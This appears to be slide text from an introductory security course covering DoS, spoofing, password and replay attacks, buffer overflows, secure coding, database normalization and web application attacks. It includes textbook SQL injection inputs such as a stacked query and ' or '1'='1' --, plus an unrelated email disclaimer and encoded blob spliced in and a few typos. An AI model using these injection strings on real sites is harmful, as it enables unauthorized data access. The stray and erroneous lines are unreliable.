This document discusses advanced attacks and secure coding concepts. It compares common attacks like denial-of-service, privilege escalation, and spoofing. It also summarizes secure coding practices such as input validation, error handling, and normalization. Application attacks like SQL injection, cross-site scripting, and cross-site request forgery are identified. Finally, it touches on security frameworks and guides.
2. Introduction
• Comparing common attacks
• Summarizing secure coding
concepts
• Identifying application attacks
• Understanding frameworks and
guides
3. Common
Attacks
• Denial-of-service (DoS)
– Comes from one system
• Distributed denial-of-service
(DDoS)
– Multiple attacking computers
– Typically include sustained,
abnormally high network traffic
4. Common
Attacks
• Privilege escalation
– Gain additional privileges after initial
exploit
• Spoofing
– Impersonating or masquerading
as someone or something else
– MAC spoofing
– IP spoofing
5. Common
Attacks
• SYN flood attack
– Common attack against Internet
servers
– Disrupts the TCP three-way handshake
– Withholds 3rd packet
9. DNS Attacks
• DNS poisoning
– Attempt to corrupt DNS data
– Protect against with DNSSEC
• Pharming
– Redirects a web site’s traffic to another
web site
• DDoS DNS attacks
– DNS amplification attack
10. Amplification
Attack
• Smurf
– A ping is normally unicast
– Smurf attack sends the ping out as a
broadcast
– Smurf attack spoofs the source IP
– Directed broadcast through an amplifying
network
– Disable directed broadcasts on border
routers
13. Password
Attacks
• Online password attack
– Attempts to discover a password from an
online system
• Online password attack
– Attempts to discover passwords from a
captured database or captured packet scan
15. Password
Attacks
• Pass the hash
– Attacker discovers the hash
– Attacker uses the hash to log on
– Older protocols susceptible
• Microsoft LAN Manager (LM)
• NT LAN Manager (NTLM)
• Use NTMLv2 instead
18. Common
Attacks
• Replay
– Replays data in an attempt to impersonate
client
– Timestamps and sequence numbers are
effective countermeasures
• Can be
– An application/service attack
– A wireless attack
– A cryptographic attack
19. Common
Attacks
• Known plaintext
– Attacker has samples of both the plaintext
and the ciphertext
• Compare with chosen plaintext
The information contained in this email and any
accompanying attachments may contain proprietary
information about the Pay & Park & Pay parking garage.
Nr55tySu3IFIf7f3Cjn540fSs0j0QbshCN0yOAvhN3UKr85uE
kvawEPG3lhLIklwBz7hBzhaRZ96KUYIT3wQbf2cSkWHtN8Z
QrQ+ZGJHhe8HkL42CPjHIGc0HW4urJ+NNLnNxqHyRo34a
zbnXsd3qd3Ce5GE7blWtY0duwNKy0xqhmDihUJs9nDhXB
V4nBkZ6shcmKGEUSyvCr/hOEpAYw==
20. Common
Attacks
• Typo squatting / URL hijacking
– Attackers purchase similar domain names
for various malicious purposes
– Users visit the typo squatting domain when
they enter the URL incorrectly with a
common typo
• Clickjacking
– Tricks users into clicking something different
– Typically uses frames
21. Common
Attacks
• Session hijacking
– Impersonate the user with the session ID
– Session IDs stored in cookies
• Domain hijacking
– Attacker changes the registration of the
domain name
– Typically done by using social engineering
techniques to guess owner’s password
23. Common
Attacks
• Zero-day vulnerabilities
– Undocumented and unknown to the public
– Vendor might know about it, but has not yet
released a patch to address it
• Zero day attack
– Attempts to exploit zero-day vulnerabilities
– Also known as zero day- exploit
24. Memory
Buffer
Vulnerabilities
Application bugs
• Memory leak
– App consumes more and more memory
– Can crash operating system
• Integer overflow
– App attempts to use or create numeric value
too big for the available storage
– 8-bit storage
– 95 x 59 = 5,605 (needs at least 13 bits to
store)
25. Memory
Buffer
Vulnerabilities
• Buffer overflow and buffer overflow
attack
– Occur when an application receives data
that it can’t handle
– Exposes system memory
– Often includes NOP instructions (such as
x90)
– Can then insert malicious code into memory
– Input validation helps prevent buffer
overflow attacks
27. Secure Coding
Concepts
• Compiled code
– Optimized
– Run as an executable
– Compiler checks the program for errors and
• Runtime code
– Code is evaluated, interpreted, and executed
when the code is run
– HTML is interpreted by web browsers and
displayed as web pages
28. Input
Validation
• Verifies validity of data before using it
– Verifies proper characters
– Uses boundary and/or range checking
– Blocks HTML code
– Prevents the use of certain characters
• Client-side vs server-side
– Server-side is more secure (many sites use
both)
• Input validation prevents
– Buffer overflow, SQL injection, command
injection, and
cross-site scripting attacks
29. Secure Coding
Concepts
• Avoid race conditions
– Occur when two modules attempt to access
the same resource
– First module to complete the process wins
– Database locks prevent race conditions
30. Error and
Exception
Handling
• Catch errors and provides feedback
– Prevent improper input from crashing an
application providing information to
attackers
– Errors to users should be general
– Logged information should be detailed
32. Secure Coding
Concepts
• Code reuse
– Avoid dead code
• Software development codes (SDKs)
– Provide software tools easy to reuse
• Code obfuscation
– Camouflage code
33. Code Quality
and Testing
• Static code analyzers
• Dynamic analysis
• Stress testing
• Sandboxing
• Model verification
34. Code Quality
and Testing
• Fuzzing
– Sends random strings of data to applications
looking for vulnerabilities
– Attackers use to detect strings of data that
can be used in an attack
– Administrators use fuzz testing to test
applications
35. SDLC Models
Software development life cycle (SDLC)
models
• Waterfall
– Multiple stages going from top to bottom
– Strict
• Agile
– Starts with set of principles
– Uses iterative cycles with incremental
changes
– Flexible
37. Secure Coding
Concepts
• Change management
– Ensures developers do not make
unauthorized changes
– Provides accounting structure
• Version control
– Tracks software versions
– Identifies who made the change and when
38. Secure Coding
Concepts
• Provisioning (an application)
– Preparing to deploy it
– Configuring for different applications
• Deprovisioning (an application)
– Removing it completely
43. Database
concepts
1NF
• Each row within a table is unique
and identified with a primary key
• Related data is contained in a
separate table
• None of the columns include
repeating groups
44. Database
concepts
2NF (must be in 1NF)
• Non-primary key attributes are completely
dependent on the composite primary key
Composite key Publisher column in this
table violates this rule
45. Database
concepts
3NF (must be in 2NF and 1NF)
• All columns that aren’t primary keys are only
dependent on the primary key
• None of the columns in the table
are dependent on
non-primary key attributes.
PublisherCity column violates this rule
It is dependent on the BookID column
It is dependent on the Publisher column
46. SQL Queries
• Used to access data
• Commonly used with web pages
SELECT * FROM Books WHERE Author = ‘Darril Gibson’
Attackers enter this instead: Darril Gibson'; SELECT *
FROM Customers;--
Result:
SELECT * FROM Books WHERE Author =
‘Darril Gibson’;
SELECT * FROM Customers
47. SQL Queries
SELECT * FROM Customers WHERE
name = 'Homer Simpson‘
• Using SQL Injection
SELECT * FROM Customers WHERE
name = ' ' or '1'='1' --'
• Result
SELECT * FROM Customers WHERE
name = ' '
SELECT * FROM Customers WHERE
'1'='1'
48. SQL Injection
Attack
• Used on unprotected web pages
to access backend databases
• Often use the phrase ' or '1'='1 '
• Tricks database into providing
information
• Best protection
– Input validation & stored procedures
• XML injection (similar to SQL
injection)
50. Application
Attacks
• Cross-site scripting (XSS)
– Attackers embed malicious HTML or
JavaScript code
– Can be in web site or links in email
– Prevented with server-side input
validation
– OWASP recommends use of library
51. Application
Attacks
• Cross-site request forgery (XSRF)
– Causes users to perform actions on
websites without their knowledge
– Attackers can use to steal cookies and
harvest passwords
– XSRF tokens successfully block this attack
52. Frameworks
and Guides
• Frameworks
– Regulatory
– Non-regulatory
– National versus international
– Industry-specific
• Guides
– Vendor-specific
– Platform-specific
– Role- or goal-specific